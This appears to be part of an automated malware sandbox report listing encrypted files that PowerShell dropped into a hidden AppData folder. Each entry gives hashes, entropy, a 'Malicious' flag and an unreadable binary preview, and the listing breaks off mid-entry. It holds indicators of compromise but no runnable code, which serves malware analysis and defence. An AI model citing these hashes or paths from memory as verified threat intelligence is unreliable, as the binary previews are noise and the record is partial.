.........XWX.o@Fzk.....W....3..YC.P.g.G...zN.l..E..H1..\|R..%.$....a).....O..Y.B....O'.X.o.!..L...ns....MV....7A5...._.U.<.`M...9..z.A...G.4..A.Tka/@..j....f.....X.Z...W..]!...u.C0.....\...!..z.=^,.vN....i.!...d......J.G5<w..h~I....3.....0.:.v..A..+L.^.=.E......i.VQ......i<+/..=.....].L./Z59....L\....9P..C....M...r.X....O.J\|..."uXM..!\v......2..(k.....0].0Y..q.......+...3?x.^...h..}b....p~.`1......?K8...._.....-......).....#q...Uv6DrK8L.....p<YO.....!.U....6O...CW.*........r.!/.%Y..(..j....k.T,.p%I)D1..._.......~jQB...Y~.b:...x.X....'a.)..O..\|......D..$..Mi;..m.9..C.D.PC.....t.......2!.T....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\YdykENuflJnmx.HDhgRGrkmy Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	150211
Entropy (8bit):	7.998885616713855
Encrypted:	true
SSDEEP:	3072:hw3FYPh5CO7eGMP8dzx3R3TO7giP5Twe94FJshNvTBlPAV:Omp5CmeVUBxVO5we4FYNzoV
MD5:	E389378B8D02B5B976FC608EB79F7D84
SHA1:	C3FF92FEE800B407D17CDDD0706C5955802D947B
SHA-256:	180C97BC84B680AA7810FA81AA0C051732D35F36D53E554958B876BB0FDA179C
SHA-512:	387FC8425474EFDC0E59A0E0C276558DD1F89DC98CAE9FB5D24AB7B93864A15AD72B9BA9EB52BCCE6108CD07FDFD39AC852E1277A48C23C721EFE77B7450CC8D
Malicious:	true
Reputation:	unknown
Preview:	..s ~.Hd..>...'..{A..".MV"..H..he...C...t...B...\Gh....jl.B8)No.["..L>V^t_8.=..Du...1.J..q.;.KZ33\ .\|...+.X~-....6b.r..\|x.g.....K.9.f.v..'...D.\.......H`....L.z3#....J.HR.f.....Hq.......P.X dqE.Te.v.....O..>..x.A...z..._..u.La.............B..F9/..i....k..M.} ........!....../...JA...v...4\|%F.G.Y=...MH:5...e............4.....Y......[......wu....9....[..G.e.rl)>..$..2.gw.<4.H...\|w.9.U+...A.\.M7A.c.Si..K=.T.iem...."..A0&.....F{..d.s..`...q....\|....B(..X\|.m*"..1U.>..B.X..Rb..Jv....!.^..tj.d.._L.^...Q:.m.-.\.".~..3.}...x.V7W..V...j7}.1..rG..o"...#.........6..-(!.t.K~W\1.p.40..,...,..f.[......A...Y..T.&.-....."...J.x..f..[. .T.:~./..2.....,...3..98KF.T.p5R.gC3.U[..a.N.6....,!.;Dc.:...u..l.R....v....>.w..&.X.1.+...NdP:..E...?6A..I.2l$..?o..N.:.'.(.0.........[.^.T.M...&.$...l.......h....O+..q..w.UR./.}\|..!.]s....V.&@MC~Xy..3.FT....".....Y.^O.8.+{...#+:.e......CS....U....]T\|.{..(......z>.#.:$.......&`-N$..^..-u.t......]...9\|pF`...\K.A......B

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\YkIpmuylNLPA.UwxRGKOsBVgkhCZT Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	94293
Entropy (8bit):	7.997909878792057
Encrypted:	true
SSDEEP:	1536:5dX8hLXcuK3oR4guZrVH29INYp4djLaw+6xr+dSpl18UpPV5hv4YdR0etmk:5dXI7Pu5RR29WYp4pLH+6iUpN5hAYd
MD5:	45FECD4E3FF79D2EFCB187A201953FB8
SHA1:	54F8674E10DF11FDED1E879D25AB625B7111B1CD
SHA-256:	63F56553CB44C87087AB5407C6CB19D123F8C37601EB1FA9FF9B51283947F28F
SHA-512:	9763E0AEC0994113F59E2518AE5CA090233603155D133AE38AF7AACB408A063160B09EAF4A729D0F73D37613482E2275F81A48DDCFB5969DB54548099A0300CF
Malicious:	true
Reputation:	unknown
Preview:	...c.....WO...=}......7...h.n..'3.....`-..G..(GYV].p..:............dO...=(X.{..W.F0.F]......t..b>...Bd..k....R.m....[X.P.K.. a.X.e.e.K.......%vIY."....Td...Po.......;.K.m;......n\|..L..a1..5.\.\...g.+..J5X.V...0......h...x..e......B.C....GE.x...tz.T.}.St.(.4.G ........l .......Lc=..u...QF.%V..e...`......L#.=g]..G.a.F& .X.M.8.D.f,8h.i..-gO..[...qR<...t.m...+...z..}...Q.....ip....g.l.B.A.....X.sdb2..2.g.,...njaK...Gf..V.BO..w...4k[.4.....n>..g....e..xx...../,J.b6...Z..6P...x.._....7..j.v...#1.nq..o]...k$./(..u{q.....\..i.x.0v.$>.3.....ql.`.r..Hoo.n..B8A4c.e...A.Ggq...Q.\L.5.0v.......K.y.....1.m.....Z.....T....:..V.&.c.E\V{.......8.....$.yT.....K.{P....p....YW..kv.J..%Z.)..[....I....#{{u..V.."%.8...TU.....z...m'.uSv.9.=.Vf....t......8.._.n.........b....S....b.t.o......j.......j.J...k..8..h.P.&S.....G.......I_".....h....f..c.R...z..mSjy.,a...o.7..QO5Sn.....o....+.XV\.i..oIB.F*\|+..[y.'\..q}.q....,.)...%w...sC..u.A..N......l..R.PJews.<D6...

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\YyFknxAcQLvUeEXN.kZhNUQSjplfTmcJo Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	56288
Entropy (8bit):	7.9964520717925796
Encrypted:	true
SSDEEP:	1536:yZMeBE7n8GVlgMUfkV1xkBZO0455i2VMVUU5eg2M:YMeBErJVmMok1kBp455iIy
MD5:	7F90554E106244FA969FD66E795AD3B7
SHA1:	DF8C6939E81DC8EC6E0B44A94D0F15C8A4A0AA9B
SHA-256:	76697916434989BC684A2FA6814962CD6D16CD55FFFAA5628154E10353EC51B7
SHA-512:	18DD9AB59C4F6D361786A688DFEF4DB44F5E5C809A58AF7B9B0BE45E660AB4A77DAF659743D42DAD30A1857451D9CFA84F253D3B9D8034D32209560A48BAE9AA
Malicious:	true
Reputation:	unknown
Preview:	.>.;.N.Zg..-.......(...Q...C.<]."9.d,I.VZ.Of..o.....~.Eb..).;...U....V.^..s....%[9....(..B...C......2%V.3....(.[.2.]..O.>?8./....%....0.{....b..Dcr.y.3.....d..`C.uK......p..$.F.07.....%."..I.;....a..y.....X..N0.3....].Ur.....0Z0.{2..t1&N+......S.B.y.^.oQ..........^~.X1..U...{.....l...a...sG....`..,..;N'V..Dg.tl.......1'............a?.....Z..]"o.....].AL...(i2..._...3..9B.r..7R...L..z."u.'O....g..Z.VG...z.\|..1..?...p...F..D..$.s]sK)....}..?-./#_..cSC............Z....d.4r..w...tu.. ..R.b...j?.I.I.I...a3.R.j1t..f..K....]G[..?.....=..7.D...[@..:M.at....CY.pT.....~+.sd_...k..&...:..Y"G.......d...^......>...Jx)....V[.#.....\|..,...~[=.?`.....owtQ.z..?+;.Kp...\.....g......0..5`.+.Z..K.Co.#W....z.....P..}Q.lm;.4.^..Fs.f..dEp3,?....@.g...O9....O.NI..<.c..$I$.g...V..?@T..-..\|v!.....H.zN....*n..1.....Bi..5...1..F..xn..R.f0."..Z-K.(z@.@...EPm.....w......srv.c..I...N..E.Q.a.$......VI..=]...H.w....n.....&..R..=....u....T:.....p...n...Em.+

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\ZGNuKwPLhofnDrOT.ErniRtpaAhPUT Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	140841
Entropy (8bit):	7.9984449828508195
Encrypted:	true
SSDEEP:	3072:2TwxYZbUYtrtJ36ZpoTkNkUCylfMeTqRZKb4MU1OIlyYaQQ:caYZAYRT36ZpoTaFMMKZKb4UiyvQQ
MD5:	DCB48AD5A0DC8CF9129202D18B7213BF
SHA1:	7E282138D4A3F5251BFC9A01131F7291984ADBE4
SHA-256:	7A4F1EF982992413B56DAE5A88EF1664942849093CC09A1E9E0779161873D394
SHA-512:	04CEFE1A88F43C9ADA3AC3B0B7B3E6B49FB040CEBACECCB65CCF6EC9791195042E54D78968AAF6F6858E6DAD077A5E2AAA2CDCB5D3C326F314234F62B1DF0CB5
Malicious:	true
Reputation:	unknown
Preview:	..Q..V.`^G..).p.l#.......F..QpC).I.....`BUkDBlO...{WA........5X#..'b.!..K.....O.N`.........C...G^.Q(...j....K/.br.......^../.=.z.?8e0&33..........'..d.8..q.d.E.....1K.f....Q..I[m%S.&..\@..&}.z.\|.?x..s.v...y.U..34.#%9..t\|e..9.....x.!.Rd..T)..S.G..?.......?`.K%B.T.4..`.G..^..WV.L.Rg]..5aW...P.....b.W..Q..w.mIZ..?....`.hS5.g..d..h......+.,..I.v ....H..!v..4...a....'.Rvepv......g. ..'...#.fY.h4....=}..t..6D&.^./....z2..LbvR!.^5../G!.2}....9..{...y.v....."....=...y..L....P)n...IFofF.2..s..o..Qf.\|...,...;....<...Z...b<.='M....).2,B.\|D...^w.2?.....r...........[.....:.........z9.sQM.E..R.W../d%...7..+...M....?WD':]..rc..,.g.S;.....&.k"...B..J...?...2.......3A..U[h....{..o...fL.....-..'.P......[.C..'...>..~j.1......'....1W~.wn.,(#.......(._RYOC.M....*O....%.>....'.(.8..Cx../Q.!..Z...E.mE... }KN.fj...n...[X....{.E....W...MWa........L..U..U._o......y.....J.z./L.........E....._..>....%I^PKND.d&.]oM$..(.>..m...!.I.c..U..m.u..~.x...x.[.M.c".

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\abuNFTKoPVG.aItyjRumfk Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	95995
Entropy (8bit):	7.998027822324533
Encrypted:	true
SSDEEP:	1536:KrC88/6cK6pB0+/3IJuU8mbH7HiqcdXfVmpRlC4qPAikR0IoofhP:q8CcDi+muqXCV4LPqPDBIlhP
MD5:	852ED2849572BA1CB28543B25984BFDA
SHA1:	B15244D9B7E9CCD2DB83AF4234BBA528EA0379F8
SHA-256:	E7A1A97014F33E0A1658EC910890966A1F9B86ED4ED45C38D3E9AFE747FEBBBA
SHA-512:	DFF0CF0DE7DDFC2CACB444BC489192021FB096537BDF01C4EC96E4112AD2ED8B1E60D5C6985FC349D32A85BF4F316B1720A328C1DFA52C194E088CCFF4DE910A
Malicious:	true
Reputation:	unknown
Preview:	.K...@.%......r..3~.2.&.......y#^.i.}3......4..g.R...SD..>..y..G%.S..fr.b#.X..R.D.......?..9"...=.^^}..Q...g...5..._.I...2a..].S,.R..+.t.7...T..<.$`V9\>.....ve...m.P.5....K...".!.....m6....Om.~q..-t.'.....e"T....S.M....Q.0.`.B1.H.W0....h..k...f...3.Bt...o.m.#.O..a2....{..D.,..U'l..R...'..a..g.N...f..L.!...gt...H.'..F..k........z7....q.1)....9n.y..u2X4PA.i....3.{...c..<..2.~...O..hg../..f..6.._0.'..X...:.Z...,:j...-....(v.6&N....i.L.L...b..."...<......4.8.`.a..U..f..S.@ygU.......'X..G{A).X.1.9>.../O.H...}7..F...D..{).!.#.\|...w<.gS..d...`zH.<k.0.%..v._.V.q..Zq.Ul.[..}M..-..I....7RE..d...4.A..l...Zi.....s......t#.<.{=.....]....a...?....:?.Q......./>..b....6e.@..ud4.s..A..Y..d..JY".dG.......^.T.>..rE.LB.Jd..-.U6.Q.......=$.H.>&......J...u..L~.'.-....v.....\|.4j.1...T ............4.[.`E7k.............O.)=.F.......5..JR....u..r....4 ...1.s.Sm....l......<.cIWy..b.....P'.....G.......\|N.ue[w.=.cA...G.Y..{.....+.B9s.......%..w._.<v:.D.?b.@$xtf.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\aisZXhvHPOwrmlFpfcU.wKCpWYBgsmFRt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	190392
Entropy (8bit):	7.999108554825755
Encrypted:	true
SSDEEP:	3072:149+s8d0RMhfTRl5QKb0f34A6BCOTrIQg3cot0HMQi20cdGZkmo0v6xE24:1EJqZTz5Qe07tOc3xYMQi20cfT0v6KR
MD5:	4DC440E38ED425519936621FFC61B49E
SHA1:	122F4DF080F6EA6DC1CD7EF7A6906436354D04A8
SHA-256:	2331ED408627FF3C498439448E346E3075F6C5F5E23ED35E2FF39F343D2D061C
SHA-512:	C89E7EFB856665D415B399C23436D0ABCCD1277D713D5E59FEE48662F093789673343FCFAC9CC90C6628618184A7AAC4039BEF01D200E24F4458A3DCF32DD50B
Malicious:	true
Reputation:	unknown
Preview:	d..A_..._.xh.I....^=.x.L.t....&v...z.u......b.k...5..c..YS..R..oQcp.V!kTh[eg.C.`.A]...R...T?...$....:..z.^S.....5.....x......,...A.F(.&.b.'.kJ...C.(......R...T.}=D.<.7b.O...&...!y.../.u.L6.......\....7a.n&X#2C.S...F.\|.s..7.$..-N.1Y.e.?.eo....k.$+...7L.z.3).ICh..Q..u...(..`tk..../.>{..A.....+......E.....>~...].I.9..l...Q.e..D.c.A....<k.L'.....R=....Y...\..vd.....i...u.U:.9A0..p....).hIQR....C..h.H.2...........}....@{.#..,..+...'....%.....H.f......l...E....71....we...M.....'/........+.Y..>NRf..'....f..o4)..L....'.K......MND.s...r$..._..k.).<...X.((..V"...O....LQpS.....$......IU&~.<..g.6...7.;.rY....2...i..7YZ...3C..,..pw..6..WR6.@.L+..Nf.E\|@.k.i./]f....Q.."..#.B..].^.z..7RvPA.(...w{....l.........f..Nm.c.s.}.q.S....w......\....^hU...(..-...)q9.....4....SxrH\.....a...@I20.....P...w4K..=.H.9.....D>..#...[.....n...q._..#.d.c..p.5..Jt..s.....aZL.d...........L.8&f.'\.(K.Ilx-.<.cR..<!.#.....?...\|.2.+<...B..P.T...9....c..W...,q....0c`q.c..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\arftDKGNyB.GMQpowHvgBNLha Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	127091
Entropy (8bit):	7.998695032676636
Encrypted:	true
SSDEEP:	3072:bxnTKNbU+2GZjeTpCRBCgsDAJDoHBNXS9OmY52yUh1CVKWF:FTKtU+2wqTpEBC5AJDoHPw/Y5Gh8J
MD5:	E88BEAA322D7D14AB25BB83E12EB2AF6
SHA1:	EEC97B35AC216642B706C40DA9F7BC4A5FB8EF99
SHA-256:	592EADDADA8BAEF5B4A0E6A5B50592F3979B52D55F3E10C062D3F6FE1856DABF
SHA-512:	32EFCE3E8449BDBE274829D3E20201C78B0A0DCF302C60E3A0847F90EDEFBC1238CCA543344A7CAD46D214C72F96F79EBEE29993214DFE8DEEC0A97D2E0DE9CB
Malicious:	true
Reputation:	unknown
Preview:	.^...4./...2..{.@.n$../.. .L0.....U...wwap.#..Zv.<....w"......#..%..8...g\|[..p..P..8Me.v m...}.~v.u.q_$..-t.)..>....u......=...Mza..PH..& .L..z....q. ...Fy...u...3...Z.N..p@...w.";.`.T.d.)N..\|.c.F.v.w...(.?....R..Me..%.1. .Q....\|u......l..k.L..)4..og.Q#...........Z...vrZc.._sx(u....].....G........&.w.....m..n.S..p. ..O...K.....XN... ..L.W..f.n..V.uJ....WqM.P.LK....HO.C8....6G2.zA.m.78"../.....QI.....1.!.o. ...l...Q.n...,u.E..M6.:.<....#..t...E.J..d..\|h.%.p;+.-Ys..n..K..@.9..T.8.9B..!x..l.V..PAV....-<........G...tM:..q..{s..Y..Z)...e........Ro.....0,..G.S.G.=....^u.a.....k..i...1......+.~..T#.n..W"D.}.......8.i.. ...5M.!E.H~..4..,\.A4ny...G...w..X...i..g0%.... ..C.>[[...Y.j.{.Y.m].&2.V.=T..@.'....Rj.R.q.#..g...%B..P...g...B.d2{..`.#........'..j_;.i...,...?IP5Dj..p.mG...{..\%..z7&........8..../..h.VDIoEI...#K>.3.C.y..D}.].<..k.+.)...70.......y.R!...MKu.W..4'......Q.....:.dpI[....N.L..J..].\|..=e....0..:..\|c.qi..L`7.H..b....2...........

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\bEUNujtkyH.GRbKPHQcmkrjg Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	151109
Entropy (8bit):	7.998625068793811
Encrypted:	true
SSDEEP:	3072:clDLmy7y9IFTmz4jZgmITsI7iQVmOc7JifVNbuhnikrU1yymbwp4d:clvmOye64WmI9gidNahniOXc2
MD5:	95658A099AD35B5604D632FC89659514
SHA1:	57E346D6FD672CA226AFAE800E407B72CE5D8C89
SHA-256:	1E8C5E20D5C5BD13F2DED08FBF806653F8939A6BE9B173B6905D0B0E98F802AD
SHA-512:	8B48231BA34183CB3D5797DC3F83417818114327207C3CF54D441614AF2830C8BCA1F0E15BC7B2070D5864666745C034427E130333372A0B8836867C9BA13993
Malicious:	true
Reputation:	unknown
Preview:	_...!...#...y<.q9...Z.Y-;...H......z.j.......ee..h..S..........,Xb.U..v...VWl. y........V..k<.A.....5...._....3C..F~.Kh}3.2...o.Ih...N..m.L,.......zG!9...U.C.1.^]...i._.)f.Q..K..../.G.....&)J....VT.......fo......P\....sD.....Z...k..}N.K.W..k;k[`..xK\|l..........2..<...&K......I..u.@.4=.U...A..$9.]....%0..[d..x...9...Hq..`..g[G7)wT....r.:.V.M%...G. 9g...&......N.}.n..f...l....\|.d..=...W..vF.....x.\|r../,.`..B..w.,.Dg...~].z....cr...u.......U.w.........I.eP....4xT.yjV.[...8.....ZI..=..J%.....v.CW...O.Z^.....n...B..$:...D..]s.....(...0...]:t=.O..."....P....;K.....t7..r..s..m..........9.o..REeG.ob.+..Z.p.\:...gAH.PJ.n:7...Y...N.mC.{...3w........R2$.[.W6@......D...nS\7a.\q...n..Z...$.`..'......*>....mc.._".>.T.......S;:.-..g.D.A\E.1. >C>.T.E..I.H .....3RgM...c.^...tD.b..6.Q.S.sW.#.]Q.;.1..$.9...c..7:\VL.....cP@....v.0q.0....p.......wq...2r .z.<..%...w&:.......S...O8Zf.>r.=G..3WU.....=.R...Ty'\s.i..{.....,.pW...n.v....Z......).....'ia..@.%k.,.h-.Xo.W..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\bdyzoGHUekK.hDHSQzRiMmEtleJ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	137025
Entropy (8bit):	7.998644097788723
Encrypted:	true
SSDEEP:	3072:zv+Zh/FUbE9g45HwjovC4PGsfPzYB3jnl6GEn4Br21:zv+Zht5d5wsq0Gsfs3jnsk2
MD5:	FEB680748DA7AE354BEEA8E49DF08FE6
SHA1:	D23B82AB18B2496C07A59D6E567EC32E0176B8BE
SHA-256:	BAD3C50400A9D434C59A0C783CC9C9F4D0314123C22024FC6A69EC13DE0FF6C7
SHA-512:	F1B88D3AF79F09EFC8B47880ECCDD97D265B343CB5409E0F165ED9D1A343DBAB9FB66BF943FE60D187B70A383B2D56AB643283981019CAC8242D9C94C28891A4
Malicious:	true
Reputation:	unknown
Preview:	.5N..E..g0.....2q......./..'".......TU...Hwmq.......+g.=F.!.@....=..O.I...Ek5O.C...tA..IA..@...{.m.4..K.P.;J!...X.............J.....@8$,.?'........&.10..Gi1.W.@e.Y.t..re...!.Wg>. i.S._..?.\....n...h..z..%.... ...@.W...3.'.C...i3....Q.}.....<.P.f.}.3R.5S...(..X...}...V.F..%t...J`.}..S.(.....1..<w._E.OU-n.e..?..(J........\|B.7..I.......4...C..q...-..;k.\|.+A....z...., .-......:^m.Mb.{`8..........{...eEz.%.......K.L.A,o..Z..8.........%a;......E.....O[.:c...y].f2M2h./........<.....o9...2L.N+...i[.+.;.]..+},.[G`}:.....P.g...K.1U.){.E.....}..lm..!H..Gwk.....K.C2.s7...k.@I.....)C..V......W....(::W.[..c+...0...]3(.a..Z.Mc...nb\|@...zM....:.-...;.}.[.&.......X.wmr3............... T7.}.............z.....p...s.[M...c^..%J,.+.-?p..f.JA6..\|...a..J...t(.......b......Jk..I.A.#.X..t..g.}x'.#.1......`.....&..~<>...l.l$.j".....y.<M...r.....W..[..E9.S.i.Wd.,R...D.1jF.SR..Q...5...k-r.%..j.0.J..nL)\|.H.j..Z......)A.\ND.r...TY.I..P........i....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\dBUuxjYbRCDaKm.dOWaEigxRLwAomVkDT Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	62318
Entropy (8bit):	7.9974153545173925
Encrypted:	true
SSDEEP:	768:Vc5280KdL9a2f6xicbNB6StPWfRym5Ejk4pcF43PEvYb8aootDA0RGd779jBflu:yhL2RNBef9F6caVtt0bo
MD5:	24DEF2CAC12C5A545D48A29B27B62249
SHA1:	8C25EE92935DD64F0E1F25874352D7AA72BE327C
SHA-256:	6C90EE159AF65EEACE6B2BC6C2E58EC64DADEB032288D9FFA0298A5123A7B575
SHA-512:	EB1B8462CAC1EDB04540BFA676BA304C9B0261734EB9CFC2E4EF5B112C5FC08CF20A4D874D47199290110560E7DC3DD9F0985980B102A0C3420AFA09F7C71CC6
Malicious:	true
Reputation:	unknown
Preview:	e<..V.UW.\.sD.. ../....n.D..v..pfbZ7.v=..Va.........#.[p..en...c..wS...~..q~.^..`.y...B......4/<.p...2-..F":,.........A..T....X.5.JQ..-.~.....".MA6&.....U.b......jg...#.....1...p2..`b..dOx.i...1..&OF.w..).:..Q./.o]......3.....{...!..".o[......>.B.........]......[:....X.du.<..8`p.T6JN.\|..j.6..........t.d^.....K'.y.t..........g..41zhC..n....-............!..6..0..U.....+..UZ..J..S...n\|LjX..cH.VI..OY&#......J}...E..E?bB7..j\|.....zo.,f...W. ......Z.Ox.".....h....G..@8@H.^.b.V......x....o...d..O.."..m..A.V ....2. ...}"?..Rr..Z......#...F..1.$2...FZ1../Q\'D/.....jl..q.I.c^".OM....e.A.7.....U.3...JDX..{.%.g..xa}.....*._..F...%.7...:r.Tr.....6F........[....Fr.BN.C........Ys%...j.U.n........X.G.X...V...q.........yt.r...n={..U,....H.I.{.KX>....s... ...N.i.M{..0.,../.>...."o..=^`$h.Zp.........]..+.._S..<.+.....X...+.4.-....,9..E..X...4...>...-.!...Wj.2KY.'...}.]..E..d......!.]...U=....?.g...b-"n....3CF..?..@{.C..U.$..~.......a.. P.N.....'...[j...

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\eNpjSAzFQnbKsc.RpAHXSVaGwIB Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	125484
Entropy (8bit):	7.998792865571075
Encrypted:	true
SSDEEP:	3072:2t3INPM8b5ctIN6bckU+48Go5tLvqfgJAY9KlJGgEqN50zbUt:2t4Fp5GIN6bnU+48GMk4JD9KnjEqN50Q
MD5:	750ACF7AC4299AF94954173200191AF9
SHA1:	63AC627A0626FCFCEFF7B9F6E8194D0EA4F53583
SHA-256:	61D62854271988F0EA89903932ECBBACE6111DE8EF4FECA8D1165AF1F5AE9401
SHA-512:	98877F3245420015B727D9CBAA94B95475378EDD08E91FDB2BF89409DA238E146A5B6290318532AFEDA8070C8F95A38401CEBAEA0D315A1891A238F26000E4A2
Malicious:	true
Reputation:	unknown
Preview:	......E..m>>;.P.iPU.N....~E. <..0...g.......9H...U.e...(...7...0....k+.@..<.1..b2..X.......=.m..>B..S..7`..%.M.....{.v..BP....a.%Z ..x.P[3......!(.....4.....Ja.2f..A..$.C....7/.../'...wu%d..R.\......pm.....vV.}...>B_.....q.T#.M!.......t...E.....F0k.r.`.)........C..P.+-//..+L.....\.M./.........N..9d.=.B.^.....F..g..r.T%b..j....tl.v..v.......~M/..X%..>....{`=3.m:.I.Ii..>G........FM.7.z.2.p.LM.....Wn9....t..Kh&.....r..@f.F.9......z.@...FP.^.&.....X.AY.7:.....r.....q.a;>biU........:{H.S.<.(.q.!...D.1..g..>3#0..e.d....<V..:\.........dE....d..#6?DOW....-q.C.zW[.y. ..B..o.....qi.e[`.J.<c..l.8S-.s.JQ..ok.zW..k.........M....>...dZ.BX..p..O.`.y\.C...p@..-..i..4.....(.j..6}...N..s...!.+....#zKH..jn....;.e...."..H....qg.....5.S;..S.>..#B{.1D:....\|...5..\Xzzzx...?.9.#.....=n..`5.>.K.(.......1.....P.YO..?l...v..EtF.\.s}.?....@.. ..>..Pn..Z..&...f.5/{.....J.R.Vy...V4.#....0."9.....=#...&$.=.........*..1........ke....vl...cxYw/\|....{..........y

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\evPHQcahCdxyIltEsZ.uUmEaIqixpsDQwV Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	198571
Entropy (8bit):	7.999047955901601
Encrypted:	true
SSDEEP:	6144:NQ8X4UoaJyndOw97FYKps/p7wrzL9QmDz:plJyn5ZqfB7wrzLt
MD5:	787695B126458474EA9AD023655A3985
SHA1:	735E1183D981A72B1D53DB2D869E4558AB8152B0
SHA-256:	D878C5C19C81A311A93DA9EC3A4E068BCEE4B8BFA5901D4778A7F8C05A7168C2
SHA-512:	E16A077D5FB10B6EB8CD9BE0763B4A6D6A99CF90169D18EA2E8109E33DD3C38A89BC4A4EEC209F28F0B2D9FD8BD2167E5569B9F45F5228E66E9DEDD43DFA1F42
Malicious:	true
Reputation:	unknown
Preview:	i_.\V....W....Blq.T....w.......:...8k.6..O.D6..d.`y..f.6I...Fxy.G....8R\|].Ntt.SoI3.},-.g.L..T.;...P..z....\.(.\|x...........J......V..Y8..o/~.O.r&<..K.e.X.v.ZS....l.t<_Z2...eE...mM........<....JS...\_.N.H.<....X.>.{..d.~.v..\|.j...l.v.......F..7......#./.uAL..yg..Mg...ld0.CE..R...2.....BZ.<.R\|. {A:...+s..wB0Sq....5^.....n.0k.;+$r......D..l...K.fP...u....eVCS.<....ky...:....g.w..hIc.._$....w.0..%sN.h&..;..N...N<.....T..~...Z.A.(.$A....P...5(.[.]@.B...4.xT.y....6..8.#.M..~...dW.r...2a+I...(.+....p....z....2.A.D...`....M-.pP......w......k.......;Vg.B+.f..([6.qm[....i..Bo.~k...{kfY.7.KI....#5.]T.C..q..l.t(..d.....#9..E..o.:.!.zCrr.y..... ..P.Cj{E.h...+..gL.....!+m."f.Wk.a..m..%.m.8...h..~3.......X.....$p<..q.+w..N...R@.8.H....3.......^+/..iV.-.D.U....9gB.YcXal.....P[...#...PZ..F....p..2.....'..u.>..+...h.n..p..Q.....3....M.....Q......X..i.;......3....\H.^C.....l._.....e....G%..v.{dIB........i9u/J..Q.eS....x.LO.D.`...~.E.<..P...OX.*....Z....7}.`.Xr..0

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\fCWupEZiBzJwrRj.OjsfyGtuSe Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	182162
Entropy (8bit):	7.9989827380601435
Encrypted:	true
SSDEEP:	3072:7a6oRy48QxKFsQcI9/efenSpUiwT5iNhM3DAc/qGRjdXYZohLgz857CcOKmdtXc9:78yZWKpofzUiwViNhM4GRJX+o1gz5ZJA
MD5:	69EDB76D4047E1A343317A9017544663
SHA1:	230C8CF20779AE218ADC7C93DCCB1A5346286C03
SHA-256:	76846635F3C256B19F0282474B8514AEC05C00582C4E646281B1D1B428BE08C4
SHA-512:	9454D50B1A464BC1FB2448C3199611AD52E9C13B9102DF6035CDC89E4434B4EFF8A0863116311F14EBDF01D55DDE2FBE8CA4922F115E97A8E990FB8ED10A8AE9
Malicious:	true
Reputation:	unknown
Preview:	..4Iu...EI&.>J.}.B....[.u......p.).X...Ll....6<...c.k-....#.Mo.... 9%.l{m5..\.d.&.'.?4..8Z..M.;X..S..y.4.<6....4.p'.X.ni#8.Bs. ..Z.SN..6.%....uR.>....Y....>.h..M.h5.o.z.e.kkFMv.AD.N.Fi\...1.........}... ..\|.N.'....f.v."Z.3...Mh..rL.N.+%.E......?..n.."vh..../.{J.._.2;.b.Q..1s.(...Z.v~.&.....[....~..le.X..S.)C. .........A.....AQ.0H.U>x_~.B.?_...oV..p...M#M.1....:.....x..4.8....\]n~.A....L.^..%.o..kE.iq.nAm.`T.....@...M.Ib7v+.@C....(.).8....\|...h...H<.S..9RB.-.f.....Wp....F].ai.T .Bfc..."..VS....L.P..R...4 ..1..$?....5...S.X..r...YUo..I......".Da.i`.I...B..\.e.-.S.+..W(2...0~.vw..u..p.b.....Y1....l..) _......].@r....,.B.B...;.#..U.L.g..y.u.W.".........y.....]\|......<G!.2....N...2f.'e I...T.......^.O...n2DOj..g.(8.;.u4..."...lB....L..W........,0."1.N..D..t...%$.D=fB.$I..B..m_.J...6......v.l.[.......<...aG{.......99.f%....b'..q.K(!.....z..,..X..x......)++.e.......3]....\|.y...zi._f...L...".0m..k{.U>."..l....LK&D\|N<.W..1........<%.=.7v,.(...o.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\fVcmBuXaWeRtCFr.TQRGojYVyxNbCK Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	65158
Entropy (8bit):	7.997172366026852
Encrypted:	true
SSDEEP:	1536:Q+0azTB2vpjmf53rRTg/tM6W4GzEVzPWGMEhSIgkX2:Q+0eBko31E/tHGzEVzPvsIga2
